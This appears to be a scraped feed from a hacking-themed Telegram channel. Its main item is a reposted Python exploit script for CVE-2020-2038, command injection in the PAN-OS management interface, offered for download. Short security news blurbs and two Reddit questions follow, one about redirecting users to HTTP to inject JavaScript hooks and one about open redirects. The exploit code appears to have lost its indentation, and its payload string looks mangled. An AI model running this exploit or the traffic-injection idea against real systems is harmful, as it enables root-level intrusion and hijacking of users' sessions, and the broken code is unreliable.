Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.7K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
PAN-OS 10.0 Remote Code Execution

https://4.bp.blogspot.com/-f2P6cxL3l-g/WWlvB5J0BVI/AAAAAAAAIKc/5_BozSRH9sAdcCSQmN2ufmoLAOqLp1P9QCLcBGAs/s1600/h125.png
PAN-OS version 10.0 suffers from a remote code execution vulnerability.

SHA-256 | c1282cb5ecd90e16f595092c1707c237e44c6b5bd2c379fcb5da77524df6d2c8

Download
# Exploit Title: PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-08-13
# Exploit Author: UnD3sc0n0c1d0
# Software Link: https://security.paloaltonetworks.com/CVE-2020-2038
# Category: Web Application
# Version: <10.0.1,<9.1.4
# Tested on: PAN-OS 10.0 - Parrot OS
# CVE : CVE-2020-2038
#
# Description:
# An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated
# administrators to execute arbitrary OS commands with root privileges.
# More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
# Credits: Mikhail Klyuchnikov and Nikita Abramov of Positive Technologies for discovering and reporting this issue.

#!/usr/bin/env python3

import requests
import urllib3
import sys
import getopt
import xmltodict

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def banner():
print('\n###########################################################################')
print('# Proof of Concept for CVE-2020-2038 #')
print('# Vulnerability discovered by Mikhail Klyuchnikov and Nikita Abramov of #')
print('# Positive Technologies #')
print('# https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ #')
print('# #')
print('# Exploit by: Juampa Rodríguez (@UnD3sc0n0c1d0) #')
print('###########################################################################')

def exploit(target,user,password,command):
apiparam = {'type': 'keygen', 'user': user, 'password': password}
apiresponse = requests.get(target+'api/', params=apiparam, verify=False)
xmlparse = xmltodict.parse(apiresponse.content)
apikey = xmlparse['response']['result']['key']
payload = '<cms-ping<host8.8.8.8<count1<pattern111'
parameters = {'cmd': payload, 'type': 'op', 'key': apikey}
response = requests.get(target+'api', params=parameters, verify=False)
print(response.text[50:-20])

def usage():
print('\nusage: CVE-2020-2038.py\n\n')
print('arguments:')
print(' -h show this help message and exit')
print(' -t target URL (ex: http://vulnerable.host/)')
print(' -u target administrator user')
print(' -p pasword of the defined user account')
print(' -c command you want to execute on the target\n')

def main(argv):
if len(sys.argv) < 9:
banner()
usage()
sys.exit()
try:
opts, args = getopt.getopt(argv,"ht:u:p:c:")
except getopt.GetoptError:
banner()
usage()
sys.exit()
for opt, arg in opts:
if opt == '-h':
usage()
sys.exit()
if opt == '-t':
target = arg
if opt == '-u':
user = arg
if opt == '-p':
password = arg
if opt == '-c':
command = arg
banner()
exploit(target,user,password,command)
sys.exit()

if __name__ == "__main__":
try:
main(sys.argv[1:])
except KeyboardInterrupt:
print('Interrupted by users...')
except:
sys.exit()

Source:packetstormsecurity.com
Dark Reading: Attacks/Breaches
Russia-Ukraine Conflict Holds Cyberwar Lessons

Initial attacks used damaging wiper malware and targeted infrastructure, but the most enduring impacts will likely be from disinformation, researchers say. At Black Hat USA, SentinelOne's Juan Andres Guerrero-Saade and Tom Hegel will discuss.
Dark Reading: Attacks/Breaches
Domino's Takes a Methodical Approach to IoT

The success of Domino's Flex IoT project can be attributed in large part to the security best practices it followed.
Dark Reading: Attacks/Breaches
Abusing Kerberos for Local Privilege Escalation

Upcoming Black Hat USA presentation will examine the implications of Kerberos weaknesses for security on the local machine.
Dark Reading: Attacks/Breaches
Researchers Debut Fresh RCE Vector for Common Google API Tool

The finding exposes the danger of older, unpatched bugs, which plague at least 4.5 million devices.
Dark Reading: Attacks/Breaches
Halo Security Emerges From Stealth With Full Attack Surface Management Platform

The latest startup to enter the attack surface management space also has a free scanning service to audit the contents of any website.
Dark Reading: Attacks/Breaches
Microsoft Patches Zero-Day Actively Exploited in the Wild

The computing giant issued a massive Patch Tuesday update, including a pair of remote execution flaws in the Microsoft Support Diagnostic Tool (MSDT) after attackers used one of the vulnerabilities in a zero-day exploit.
hacking: security in practice
Question regarding dns redirect

Quick question for you guys.

Doing some experimentation with JS injection into http websites.

Obviously, most websites use https. The main workaround is to attempt to perform an sslstrip or HSTSHijack to try to downgrade the site to http. From there we can inject a hook and try from there.

However, most large sites have a strong HSTS policy that will not allow this to work.

My question is, would it be easier to just create a DNS redirect that forces users to a predefined http website. Meaning, if I go to https://google.com, it would redirect to http://palms.myspecies.info/

Obviously, this would get noticed by the target host, but that is not important as this is for testing purposes on my own machine.

submitted by /u/whatthe12234
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Is this still an Open redirect vulnerability?

I failed my security course twice and ironically I’m now tasked to fix security issues on an internal web app for my employer.

They’re cybersecurity 101 type of attacks but I’m still confused, is the following example still an open redirect, or is it a false positive?

the user inputs a URL on browser and the controller/service grabs the Base url of that URL and appends “custom.html” Then passes that to the servlets redirect function.

Pseudo code:

MyController(request, response) {

BaseURL = request.substring()

Response.redirect(BaseURL + “custom.html”)

}

submitted by /u/GuerroCanelo
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video